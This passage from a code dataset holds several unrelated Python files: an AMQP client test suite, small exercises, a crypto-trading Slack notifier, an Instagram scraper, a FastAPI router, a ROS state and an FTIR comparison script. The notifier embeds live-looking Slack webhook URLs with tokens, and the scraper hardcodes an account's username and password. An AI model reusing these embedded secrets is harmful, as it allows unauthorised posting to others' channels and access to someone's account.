-> typing.NoReturn:\n count, channel, frame_value = frame.unmarshal(value)\n self.assertEqual(count, len(value), 'All bytes used')\n self.assertEqual(channel, 0, 'Frame was published on channel 0')\n if frame_value.name == 'ProtocolHeader':\n self.loop.call_soon(self._connection_start)\n elif frame_value.name == 'Connection.StartOk':\n self.loop.call_soon(self._connection_tune)\n elif frame_value.name == 'Connection.TuneOk':\n pass\n elif frame_value.name == 'Connection.Open':\n self.loop.call_soon(self._connection_open_ok)\n elif frame_value.name == 'Connection.Close':\n self.loop.call_soon(self._connection_close_ok)\n elif frame_value.name == 'Connection.CloseOk':\n pass\n elif frame_value.name == 'Heartbeat':\n self.heartbeat.set()\n else:\n raise RuntimeError(count, channel, frame_value)\n\n async def open(self):\n self.assert_state(state.STATE_UNINITIALIZED)\n await self.channel0.open(self.transport)\n\n def assert_state(self, value):\n self.assertEqual(\n self.channel0.state_description(value), self.channel0.state)\n\n def test_negotiation(self):\n self.loop.run_until_complete(self.open())\n\n\nclass ProtocolMismatchTestCase(TestCase):\n\n def _connection_start(self):\n self.channel0.process(\n commands.Connection.Start(\n version_major=1, version_minor=0,\n server_properties=self.server_properties))\n\n def test_negotiation(self):\n with self.assertRaises(exceptions.ClientNegotiationException):\n self.loop.run_until_complete(self.open())\n self.assert_state(state.STATE_EXCEPTION)\n\n\nclass RemoteCloseTestCase(TestCase):\n\n def test_with_remote_200(self):\n self.loop.run_until_complete(self.open())\n self.channel0.process(commands.Connection.Close(200, 'OK'))\n self.assert_state(channel0.STATE_CLOSEOK_SENT)\n\n def test_with_invalid_path(self):\n self.loop.run_until_complete(self.open())\n self.channel0.process(\n commands.Connection.Close(402, 'INVALID-PATH'))\n self.on_remote_close.assert_called_once_with(402, 'INVALID-PATH')\n\n\nclass ClientCloseTestCase(TestCase):\n\n def test_close(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.loop.run_until_complete(self.channel0.close())\n self.assert_state(channel0.STATE_CLOSEOK_RECEIVED)\n\n\nclass ConnectionBlockedTestCase(TestCase):\n\n def test_block_unblock(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.channel0.process(commands.Connection.Blocked())\n self.assert_state(channel0.STATE_BLOCKED_RECEIVED)\n self.assertTrue(self.channel0.blocked.is_set())\n self.channel0.process(commands.Connection.Unblocked())\n self.assert_state(channel0.STATE_UNBLOCKED_RECEIVED)\n self.assertFalse(self.channel0.blocked.is_set())\n\n\nclass HeartbeatTestCase(TestCase):\n\n def test_heartbeat(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.channel0.process(heartbeat.Heartbeat())\n self.assert_state(channel0.STATE_HEARTBEAT_SENT)\n self.assertTrue(self.heartbeat.is_set())\n\n\nclass NoHeartbeatTestCase(TestCase):\n\n HEARTBEAT_INTERVAL = 0\n SERVER_HEARTBEAT_INTERVAL = 0\n\n def test_negotiated_interval(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.assertEqual(self.channel0._heartbeat_interval, 0)\n\n\nclass NoClientHeartbeatTestCase(TestCase):\n\n HEARTBEAT_INTERVAL = None\n SERVER_HEARTBEAT_INTERVAL = 0\n\n def test_negotiated_interval(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.assertEqual(self.channel0._heartbeat_interval, 0)\n\n\nclass SmallerClientHeartbeatTestCase(TestCase):\n\n HEARTBEAT_INTERVAL = 10\n SERVER_HEARTBEAT_INTERVAL = 30\n\n def test_negotiated_interval(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.assertEqual(self.channel0._heartbeat_interval, 10)\n\n\nclass HeartbeatCheckTestCase(TestCase):\n\n HEARTBEAT_INTERVAL = 5\n\n def test_within_range(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.channel0._last_heartbeat = self.loop.time() - 5\n self.channel0._heartbeat_check()\n self.assertIsInstance(\n self.channel0._heartbeat_timer, asyncio.TimerHandle)\n self.on_remote_close.assert_not_called()\n\n def test_too_many_missed(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n current_time = self.loop.time()\n with mock.patch.object(self.loop, 'time') as time:\n time.return_value = current_time + (self.HEARTBEAT_INTERVAL * 4)\n self.channel0.update_last_heartbeat()\n self.channel0._last_heartbeat -= (self.HEARTBEAT_INTERVAL * 3)\n self.channel0._heartbeat_check()\n self.on_remote_close.assert_called_once_with(\n 599, 'Too many missed heartbeats')\n\n\nclass InvalidFrameTestCase(TestCase):\n\n def test_invalid_frame_state(self):\n self.channel0.process(commands.Basic.Cancel('foo'))\n self.assert_state(state.STATE_EXCEPTION)\n self.assertIsInstance(self.channel0._exception,\n exceptions.AIORabbitException)\n\n\nclass ResetTestCase(TestCase):\n\n def test_reset_attributes(self):\n self.loop.run_until_complete(self.open())\n self.assertDictEqual(self.channel0.properties, self.server_properties)\n self.channel0.reset()\n self.assertDictEqual(self.channel0.properties, {})\n","repo_name":"gmr/aiorabbit","sub_path":"tests/test_channel0.py","file_name":"test_channel0.py","file_ext":"py","file_size_in_byte":8679,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"34"} +{"seq_id":"29171759590","text":"from common import * \n\ndef fib():\n \"\"\"returns the fibonacci series up to a max value of num\"\"\"\n a = 1\n b = 1\n yield {\"i\":1,\"num\":a} # cheap fix for forcing F1 and F2 = 1\n yield {\"i\":2,\"num\":b}\n c = a + b\n\n i = 3\n while True:\n c = a + b\n yield {\"i\":i,\"num\":c}\n a=b\n b=c\n i+=1\n\nfor n in fib():\n print(str(n[\"i\"])+\": \"+str(n[\"num\"])+\" has \"+str(countDigits(n[\"num\"]))+\" digits.\")\n if countDigits(n[\"num\"])>=1000:\n answer = n[\"num\"]\n break\n\n#print(str(answer))\n","repo_name":"verdande2/Project-Euler-Python","sub_path":"problem25.py","file_name":"problem25.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34975410339","text":"#gc12\nimport time\n\nsiblingcount = int(input(\"How many siblings?: \"))\nx = 10\nt = x/siblingcount\n\nfor x in range(siblingcount):\n print(\"Next person up! \\n\")\n time.sleep(t)\nprint(\"Time's up for everyone!\")\n","repo_name":"sonbun/pythonchallenges","sub_path":"GC/gc12.py","file_name":"gc12.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"18087684492","text":"# -*- coding: utf-8 -*-\nimport sys\n\nfrom datetime import datetime\nfrom carbi.config import CarbiConfigKeys\nfrom carbi.module.trade.notifier import notify_slack\nfrom carbi.module.trade.notifier.content.notify_trade_execution_result import NotifyTradeExecutionResultMessageContent\nfrom carbi.module.trade.notifier.content.notify_trasfer_needed import NotifyTransferNeededMessageContent\nfrom carbi.module.trade.notifier.content.notify_balancing_task_result import NotifyBalancingTaskResultMessageContent\nfrom carbi.module.trade.notifier.content.notify_balance_status import NotifyBalanceStatusMessageContent\nfrom carbi.utils.dyprops import DynamicProperties\n\nSLACK_URLS = DynamicProperties(\n ALARM_URL='https://hooks.slack.com/services/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',\n STATUS_URL='https://hooks.slack.com/services/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',\n TX_URL='https://hooks.slack.com/services/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',\n)\n\n\nclass TradeNotifier(object):\n def __init__(self, injector):\n self.injector = injector\n self.logger = injector.logger\n self.last_sent_balance_status = None\n\n def notify_result(self, result):\n \"\"\"\n 거래 결과 및 거래로 인해 코인 송금이 필요한 경우 슬랙으로 알린다.\n \"\"\"\n if not self.injector.config[CarbiConfigKeys.SLACK_ENABLED]:\n return\n self._notify_trade_execution_result(result)\n self._notify_trade_execution_error(result)\n self._notify_transfer_needed(result)\n\n def _notify_trade_execution_result(self, result):\n try:\n url = SLACK_URLS.TX_URL\n content = NotifyTradeExecutionResultMessageContent(result)\n notify_slack(url, content)\n except Exception as e:\n self.logger.error(e, exc_info=sys.exc_info())\n\n def _notify_trade_execution_error(self, result):\n if result.is_trade_execution_succeed:\n return\n try:\n url = SLACK_URLS.ALARM_URL\n content = NotifyTradeExecutionResultMessageContent(result)\n notify_slack(url, content)\n except Exception as e:\n self.logger.error(e, exc_info=sys.exc_info())\n\n def _notify_transfer_needed(self, result):\n if not result.is_transfer_needed:\n return\n try:\n url = SLACK_URLS.ALARM_URL\n content = NotifyTransferNeededMessageContent(result)\n notify_slack(url, content)\n except Exception as e:\n self.logger.error(e, exc_info=sys.exc_info())\n\n def notify_balancing_task_result(self, result, balancing_task):\n \"\"\"\n 거래로 인해 생기는 코인 갯수 오차 등을 보정한 경과를 슬랙으로 알린다.\n \"\"\"\n if not self.injector.config[CarbiConfigKeys.SLACK_ENABLED]:\n return\n try:\n url = SLACK_URLS.ALARM_URL\n content = NotifyBalancingTaskResultMessageContent(result, balancing_task)\n notify_slack(url, content)\n except Exception as e:\n self.logger.error(e, exc_info=sys.exc_info())\n\n def notify_balance_status(self, market_ctx, balance_ctx):\n \"\"\"\n 주기적으로 현재 펀드의 잔액에 대한 정보를 슬랙으로 알린다.\n \"\"\"\n if not self._should_notify_balance_status():\n return\n try:\n url = SLACK_URLS.STATUS_URL\n content = NotifyBalanceStatusMessageContent(market_ctx, balance_ctx)\n notify_slack(url, content)\n self.last_sent_balance_status = datetime.now()\n except Exception as e:\n self.logger.error(e, exc_info=sys.exc_info())\n\n def _should_notify_balance_status(self):\n if not self.injector.config[CarbiConfigKeys.SLACK_ENABLED]:\n return False\n now = datetime.now()\n if not self.last_sent_balance_status:\n return True\n if self._equal_in_minute_scale(self.last_sent_balance_status, now):\n return False\n if now.minute % 60 == 0:\n return True\n return False\n\n def _equal_in_minute_scale(self, dt1, dt2):\n \"\"\"\n dt1과 dt2가 year, month, day, hour, minute 값이 같을 경우 True를 return 한다.\n :param dt1: datetime.datetime\n :param dt2: datetime.datetime\n :return:\n \"\"\"\n return dt1.year == dt2.year and dt1.month == dt2.month and dt1.day == dt2.day and dt1.hour == dt2.hour \\\n and dt1.minute == dt2.minute\n","repo_name":"modulabs/blockchain-lab","sub_path":"season3/ewmkkpe/carbi/carbi/module/trade/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"36872000263","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 25 15:40:00 2018\n\n@author: misskeisha\n\"\"\"\n\ndef substring(s1, s2, k):\n return s2[k:k+len(s1)] == s1\ndef how_many(s1, s2):\n count = 0\n for i in range(len(s2)):\n if substring(s1, s2, i):\n count +=1\n return count\ns1 = input(\"enter first string\")\ns2 = input(\"enter second string\")\nprint(how_many(s1,s2))\n","repo_name":"hibalubbad/hiba.baddie","sub_path":"asst3_hil00/substring.py","file_name":"substring.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72518011297","text":"\"\"\"\nSame as 3sum, quadratic time algorithm\nFor each pair of points, memorize the slope and constant\nin the linear equation. For simplicity use integer coordinate\n\"\"\"\nfrom random import *\nimport numpy as np, pylab as pl\nfrom matplotlib import pyplot, lines\n\ndef collinear(points):\n lines = {}\n n = points.shape[1]\n for i in xrange(0, n):\n for j in xrange(i + 1, n):\n x1, y1 = points[0, i], points[1, i]\n x2, y2 = points[0, j], points[1, j]\n if x1 == x2:\n k = 0\n c = x1\n else:\n k = 1.0 * (y2 - y1) / (x2 - x1)\n c = y1 - k * x1\n if lines.has_key((k, c)):\n return lines[(k, c)] + [(x1, y1), (x2, y2)]\n else:\n lines[(k, c)] = [(x1, y1), (x2, y2)]\n return False\n\nif __name__ == '__main__':\n n = 20 \n points = np.random.random_integers(-50, 50, (2, n))\n pts = collinear(points)\n\n # plot the figure\n fig = pyplot.figure()\n ax = pyplot.subplot(111)\n ax.plot(points[0], points[1], 'ro')\n if pts != False:\n pts_coord = np.array(pts).transpose()\n line = lines.Line2D(pts_coord[0], pts_coord[1], \n linewidth=2, color='green')\n ax.add_line(line)\n ax.plot(pts_coord[0], pts_coord[1], 'bo')\n pyplot.show()\n","repo_name":"iveney/algorithm","sub_path":"collinear.py","file_name":"collinear.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"43501233573","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup as bs\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.chrome.options import Options\nimport time\nimport os\nimport re\nfrom urllib.request import urlopen\nimport json\nfrom pandas.io.json import json_normalize\nimport pandas as pd, numpy as np\nimport requests\nclass scrapper:\n\tdef __init__(self):\n\t\tself.chrome_options = Options()\n\t\tself.chrome_options.add_argument(\"--headless\")\n\t\tself.br = webdriver.Chrome(executable_path=\"/usr/bin/chromedriver\" , options = self.chrome_options)\n\tdef scrap(self,username, password):\n\t\tself.br.get('https://www.instagram.com/accounts/login/')\n\t\ttime.sleep(3)\n\t\tself.br.find_element_by_name('username').send_keys(username)\n\t\tbeforeTitle = self.br.title\n\t\tself.br.find_element_by_name('password').send_keys(password, Keys.ENTER)\n\t\ttime.sleep(3)\n\t\tafterTitle = self.br.title\n\t\tif beforeTitle==afterTitle:\n\t\t\tprint(\"Bad Login Information\")\n\t\telse:\n\t\t\tprint(\"Login successful\")\n\t\t\tself.br.get('https://www.instagram.com/'+username)\n\t\t\ttime.sleep(5)\n\t\t\tPagelength = self.br.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\t\t\tlinks = []\n\t\t\tsource = self.br.page_source\n\t\t\tdata = bs(source, 'html.parser')\n\t\t\tbody = data.find('body')\n\t\t\tscript = body.findAll('article')[1]\n\t\t\tfor link in script.findAll('a'):\n\t\t\t\tif re.match(\"/p\", link.get('href')):\n\t\t\t\t\tlinks.append('https://www.instagram.com' + link.get('href'))\n\t\t\tresult = pd.DataFrame()\n\t\t\tfor i in range(len(links)):\n\t\t\t\ttry:\n\t\t\t\t\tpage = urlopen(links[i]).read()\n\t\t\t\t\tdata = bs(page, 'html.parser')\n\t\t\t\t\tbody = data.find('body')\n\t\t\t\t\tscript = body.find('script')\n\t\t\t\t\traw = script.text.strip().replace('window._sharedData =', '').replace(';', '')\n\t\t\t\t\tjson_data = json.loads(raw)\n\t\t\t\t\tposts = json_data['entry_data']['PostPage'][0]['graphql']\n\t\t\t\t\tposts = json.dumps(posts)\n\t\t\t\t\tposts = json.loads(posts)\n\t\t\t\t\tx = pd.DataFrame.from_dict(json_normalize(posts), orient='columns')\n\t\t\t\t\tx.columns = x.columns.str.replace(\"shortcode_media.\", \"\")\n\t\t\t\t\tresult = result.append(x)\n\n\t\t\t\texcept:\n\t\t\t\t\tnp.nan\n\t\t\t# Just check for the duplicates\n\t\t\t\n\t\t\tresult = result.drop_duplicates(subset='shortcode')\n\t\t\tresult.index = range(len(result.index))\n\t\t\tprint(len(result.index))\n\t\t\tnewpath = \"/home/rtcl/Deep-fashion/scraped/\" + username + \"/\"\n\t\t\tif not os.path.exists(newpath):\n\t\t\t#print(\"New path created\")\n\t\t\t\tos.makedirs(newpath)\n\t\t\tfor i in range(len(result)):\n\t\t\t\tr = requests.get(result['display_url'][i])\n\t\t\t\twith open(newpath + result['shortcode'][i] + \".jpg\", 'wb+') as f:\n\t\t\t\t\tf.write(r.content)\n\t\tself.br.close()\n\t\tself.br.quit()\nif __name__ == \"__main__\":\n\t\texample = scrapper()\n\t\texample.scrap('shopickdummy', 'shopick1234')\n","repo_name":"skkuse02/2019fall_41class_team6","sub_path":"Backend/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"727263687","text":"from ..schemas import postSchema\r\nfrom fastapi import APIRouter, HTTPException, Depends\r\n\r\nfrom sqlalchemy.orm import Session\r\n\r\nfrom ..repositories.database import SessionLocal\r\nfrom ..repositories import postCrud\r\n\r\n# Dependency\r\ndef get_db():\r\n db = SessionLocal()\r\n try:\r\n yield db\r\n finally:\r\n db.close()\r\n\r\n\r\nrouter = APIRouter(\r\n prefix=\"/posts\",\r\n tags=[\"posts\"],\r\n responses={404: {\"description\": \"Not found\"}}\r\n)\r\n\r\n@router.get(\"/\", response_model=list[postSchema.Post])\r\nasync def posts(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\r\n posts = postCrud.get_posts(db, skip=skip, limit=limit)\r\n return posts\r\n\r\n\r\n@router.get(\"/{post_id}\", response_model=postSchema.Post)\r\nasync def post(post_id: int, db: Session = Depends(get_db)):\r\n db_post = postCrud.get_post(db, post_id)\r\n if (db_post is None):\r\n raise HTTPException(status_code=404, detail=\"Post Not Found\")\r\n return db_post\r\n\r\n\r\n@router.post(\"/create_post\", response_model=postSchema.Post)\r\nasync def create_post(newPost: postSchema.PostCreate, db: Session = Depends(get_db)):\r\n db_post = postCrud.create_post(db, newPost)\r\n return db_post\r\n\r\n\r\n@router.post(\"/upvote\", response_model=postSchema.Post)\r\nasync def upvote_post(vote: postSchema.PostVote, db: Session = Depends(get_db)):\r\n id = vote.id\r\n db_post = postCrud.upvote_post(db, id)\r\n return db_post\r\n\r\n\r\n@router.post(\"/downvote\", response_model=postSchema.Post)\r\nasync def downvote_post(vote: postSchema.PostVote, db: Session = Depends(get_db)):\r\n id = vote.id\r\n db_post = postCrud.downvote_post(db, id)\r\n return db_post\r\n\r\n","repo_name":"kpp16/RedditClone","sub_path":"backend/app/routers/postRouter.py","file_name":"postRouter.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34460587375","text":"\"\"\"\r\nCreated on Wed May 18 2022\r\n\r\n@author: Jake Carter\r\nPiE Homework 1 file 2:\r\nIncludes pyramid, findSquares, calSalary, calLetterGrade functions for homework 1\r\n\"\"\"\r\n\r\n\r\ndef pyramid(s:str):\r\n \"\"\"\r\n pyramid(s:str)\r\n Takes a string input (s) and creates a message pyramid out of it\r\n \"\"\"\r\n i = 1\r\n while i <= len(s):\r\n print(s[0:i])\r\n i += 1\r\n\r\ndef findSquares(s:int = 0, e:int = 0):\r\n \"\"\"\r\n findSquares(s:int = 0, e:int = 0)\r\n Takes 2 integer inputs and finds all perfect squares between them\r\n If only one arguement is entered, all perfect squares less than the input will be output\r\n \"\"\"\r\n import math\r\n squares = []\r\n i = max(0, min(s, e)) #Sets minimum perfect square to 0 or smaller input\r\n upperBound = max(s, e)\r\n while i <= upperBound:\r\n if math.isqrt(i) ** 2 == i:\r\n squares.append(i)\r\n i +=1\r\n return squares\r\n\r\ndef calSalary(h:float, r:float = 20):\r\n \"\"\"\r\n calSalary(h:float, r:float = 20)\r\n Takes a float inputs for hours (h) worked and for hourly rate (r) and calulates salary\r\n If no hourly rate is specified, a default rate of 20 will be used\r\n \"\"\"\r\n if h < 0: #\r\n print(\"Not valid Hours\")\r\n return -1\r\n elif h > 40: #overtime case\r\n return (40 * r) + ((h - 40) * r * 1.2)\r\n else: #base case\r\n return h * r * 1.0\r\n\r\ndef calLetterGrade(points:float, gradescale:list = [98, 94, 91, 88, 85, 82, 79, 76, 73, 70, 67, 64]):\r\n \"\"\"\r\n calLetterGrade(points:float, gradescale:list = [98, 94, 91, 88, 85, 82, 79, 76, 73, 70, 67, 64])\r\n Calculates letter grade (points) based on number grade and the gradescale arguement (gradescale)\r\n The gradescale arguement should be input as a list of at most 12 numbers in decending order\r\n If no gradescale list is entered, the function calculates the letter grade based on the gradescale for PiE\r\n \"\"\"\r\n lGrades = [\"A+\", \"A\", \"A-\", \"B+\", \"B\", \"B-\", \"C+\", \"C\", \"C-\", \"D+\", \"D\", \"D-\"]\r\n try:\r\n if len(gradescale) > 12:\r\n print(\"gradescale has too many entries\")\r\n return -1\r\n for i in range(0, len(gradescale)):\r\n if gradescale.count(gradescale[i]) > 1:\r\n print(\"gradescale has repeated entry\")\r\n return -1\r\n i += 1\r\n #List is valid, calculate grade:\r\n if points < gradescale[-1]:\r\n return \"F\"\r\n for j in range(0, len(gradescale)):\r\n if points >= gradescale[j]:\r\n return lGrades[j]\r\n except:\r\n return -1\r\n","repo_name":"JakeCarter0/ECE-592-HW1","sub_path":"Homework1.py","file_name":"Homework1.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36643234459","text":"#!/usr/bin/python\n\nimport rospy\nimport smach\nimport smach_ros\nfrom cob_object_detection_msgs.msg import *\nfrom cob_object_detection_msgs.srv import *\nfrom visualization_msgs.msg import Marker\n\n\nclass PublishDetectedObjects(smach.State):\n\tdef __init__(self):\n\t\tsmach.State.__init__(\n\t\t\tself,\n\t\t\toutcomes=['published'],\n\t\t\tinput_keys=['object'])\n\t\tself.color_inc = 0\n\t\tself.vis_pub = rospy.Publisher('detected_object_marker', Marker)\n\n\tdef insert_detected_object(self,detection):\n\t\tobject_label = detection.label\n\t\tobject_pose = detection.pose\n\t\tobject_bb = detection.bounding_box_lwh\n\n\t\tmarker = Marker()\n\t\tmarker.header = detection.pose.header\n\t\tmarker.ns = \"ExploreScene\"\n\t\tmarker.id = 0\n\t\tmarker.type = 1\n\t\tmarker.action = 0\n\t\tmarker.pose = object_pose.pose\n\t\tmarker.scale.x = object_bb.x\n\t\tmarker.scale.y = object_bb.y\n\t\tmarker.scale.z = object_bb.z\n\t\tmarker.color.a = 1.0\n\t\tmarker.color.r = 0.0 + self.color_inc;\n\t\tmarker.color.g = 1.0 - self.color_inc;\n\t\tmarker.color.b = 0.0 ;\n\t\n\t\tself.color_inc = self.color_inc + 0.1\n\n\t\tself.vis_pub.publish( marker );\n\n\t\n\tdef execute(self,userdata):\n\t\t#publish all detected objects\n\t\tself.insert_detected_object(userdata.object)\n\t\treturn 'published'\n\n\nclass SM(smach.StateMachine):\n\tdef __init__(self):\n\t\tsmach.StateMachine.__init__(self,outcomes=['ended'])\n\t\twith self:\n\t\t\tsmach.StateMachine.add('STATE',PublishDetectedObjects(),\n\t\t\t\ttransitions={'published':'STATE'})\n\n\t\n\nif __name__=='__main__':\n\trospy.init_node('PublishDetectedObjects')\n\tsm = SM()\n\tsm.userdata.object = Detection()\n\tsm.userdata.object.bounding_box_lwh.x = 0.1\n\tsm.userdata.object.bounding_box_lwh.y = 0.1\n\tsm.userdata.object.bounding_box_lwh.z = 0.1\n\tsis = smach_ros.IntrospectionServer('SM', sm, 'SM')\n\tsis.start()\n\toutcome = sm.execute()\n\trospy.spin()\n\t#sis.stop()'quit':{'SelectObjectFromTablet':'quit'}})\n \n \n#rospy.init_node('eHealth2012')\n#sm = SM()\n#outcome = sm.execute()\n#rospy.spin()\n\n\n","repo_name":"ipa320/cob_scenario_states","sub_path":"cob_generic_states_experimental/src/cob_generic_states_experimental/PublishDetectedObjects.py","file_name":"PublishDetectedObjects.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"11430641869","text":"'''\n@auhor: Pablo Seijo\n@date: 19/3/2023\n@company: USC ETSE\n@description: Este codigo coge valores de las medias geometricas de tes medciones de los ciclos por lineas de cache de tres\ntxt, y siendo D el tamaño de salto en doubles (cada uno es 8 bytes) y nos devuelve un png con una donde comparamos las graficas\ncuando el experimento se hace con double, int y con acceso directo.\n'''\n\nimport matplotlib.pyplot as plt\nimport os\n\n# Le paso los valores de L y de D para usarlos en las graficas posteriormente\nD_parameters = [2, 32, 128, 1024, 8192]\nL_parameters = [384, 1152, 10240, 15360, 40960, 81930, 163930]\n\n# Lee los valores desde el archivo de texto de los valores medios de double\nwith open('menoresDatosDouble.txt', 'r') as f:\n valuesDouble = [float(x) for x in f.readlines()]\n\n# Lee los valores desde el archivo de texto de los valores medios de int\nwith open('menoresDatosInt.txt', 'r') as fp:\n valuesInt = [float(x) for x in fp.readlines()]\n\n# Lee los valores desde el archivo de texto de los valores medios de acceso directo\nwith open('menoresDatosDirecto.txt', 'r') as fpd:\n valuesDirectAccess = [float(x) for x in fpd.readlines()]\n\n# crear un array de arrays dividido en los grupos de 7 necesarios para la realizacion de\n# las graficas, ergo groups[0] = {list: 7} [...], y asi hasta los 5 grupos necesarios\ngroupsDouble = [valuesDouble[i:i + 7] for i in range(0, len(valuesDouble), 7)]\ngroupsInt = [valuesInt[i:i + 7] for i in range(0, len(valuesInt), 7)]\ngroupsDirectAccess = [valuesDirectAccess[i:i + 7] for i in range(0, len(valuesDirectAccess), 7)]\n\n# Crea una gráfica con múltiples líneas\nfig, ax = plt.subplots()\n\n#Ajustamos el tamaño de la figura\nfig.set_size_inches(7, 5)\n\n# Añade cada conjunto de datos como una nueva línea en la misma gráfica\nfor i, group in enumerate(groupsDouble):\n if i == 0:\n ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='gold', label = 'Double')\n else:\n ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='gold')\n\n\n# Añade cada conjunto de datos como una nueva línea en la misma gráfica\nfor i, group in enumerate(groupsInt):\n if i == 0:\n ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='blueviolet', label = 'Int')\n else:\n ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='blueviolet')\n\n\n# Añade cada conjunto de datos como una nueva línea en la misma gráfica\nfor i, group in enumerate(groupsDirectAccess):\n if i == 0:\n ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='crimson', label = 'Acceso Directo')\n else:\n ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='crimson')\n\n\n# Título de la gráfica\nax.set_title('Número de ciclos por cada L y D')\n\n# Nombre de los ejes x e y\nax.set_xlabel('Parámetros de L')\nax.set_ylabel('Número de ciclos')\n\n# Añadimos la leyenda\nax.legend(loc = 'best')\n\n# Guardamos la gráfica en un archivo png\nplt.savefig('grafica.png')\n\nprint(\"Por favor, compruebe que se ha generado el archivo grafica.png en la siguiente lista: \", os.listdir())\n","repo_name":"Vehkzyr/ArqComp","sub_path":"Practica1/graficasColapsadas.py","file_name":"graficasColapsadas.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12959342106","text":"#Python RMSE FTIR comparison software\nprint (\"Softare for RMSE comparison\")\nprint (\"between FTIR spectra\")\nprint (\"implemented using sklearn\")\nprint (\"Fernando Gomes / LaBioS / IMA - UFRJ\")\nprint (\"V0.1 - 03/29/21\")\nprint()\nprint()\nprint()\n# Adapted from https://mubaris.com/posts/linear-regression/\n# Importing Necessary Libraries\n#%matplotlib inline\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (20.0, 10.0)\n\nfile = input(\"Insert your CSV file's name here (without .csv): \")\nlog = str(file)+'.log'\nhead_line = 'Samples ; RMSE ; R2'\nprint(head_line)\nwith open(log, 'a') as out:\n out.write(head_line + '\\n')\n\n# Reading Data\ndata = pd.read_csv(str(file)+'.csv')\n#print(data.shape)\n#data.head()\n\n# Collecting X and Y\npos=[]\nsample=[]\nfor i in range(0,(data.shape[1])):\n pos.append(i)\n sample.append(str(data.columns[pos[i]]))\n\ncolname = data.columns[pos]\nX0 = data[colname[0]].values\nX = data[colname[1]].values\n\nfor j in range(2, data.shape[1]):\n Y = data[colname[j]].values\n ##\n ### Total number of values\n m = len(X)\n \n## from sklearn.linear_model import LinearRegression\n## from sklearn.metrics import mean_squared_error\n\n # Cannot use Rank 1 matrix in scikit learn\n X = X.reshape((m, 1))\n # Creating Model\n reg = LinearRegression()\n # Fitting training data\n reg = reg.fit(X, Y)\n # Y Prediction\n Y_pred = reg.predict(X)\n\n # Calculating RMSE and R2 Score\n mse = mean_squared_error(Y, Y_pred)\n rmse = np.sqrt(mse)\n r2_score = reg.score(X, Y)\n\n print(sample[j],np.sqrt(mse),r2_score)\n var = str(sample[1])+ '_versus_'+ str(sample[j])+';'+str(np.sqrt(mse))+';'+str(r2_score)\n with open(log, 'a') as out:\n out.write(var + '\\n')\n # Plotting Values and Regression Line\n plt.plot(X, Y_pred, color='#58b970', label='Linear fit')\n plt.scatter(X, Y, c='#ef5423', label='Scatter Plot')\n #plt.show()\n Xlabel=str(sample[1])+' - Nomalized Transmittance'\n Ylabel=str(sample[j])+' - Nomalized Transmittance'\n YlabelSpectrum=str(sample[j]+' - Nomalized Transmittance')\n plt.xlabel(Xlabel,size=22)\n plt.ylabel(Ylabel,size=22)\n plt.legend()\n plt.savefig(str(sample[1])+ '_versus_'+ str(sample[j])+'.png')\n plt.close()\n plt.xlabel('Wavenumber (cm-1)',size=22)\n plt.ylabel(YlabelSpectrum,size=22)\n plt.plot(X0, Y, color='#58b970', label='FTIR')\n plt.gca().invert_xaxis() # Tip from https://www.kite.com/python/answers/how-to-invert-the-y-axis-in-matplotlib-in-python\n plt.savefig('FTIR_'+ str(sample[j])+'.png')\n 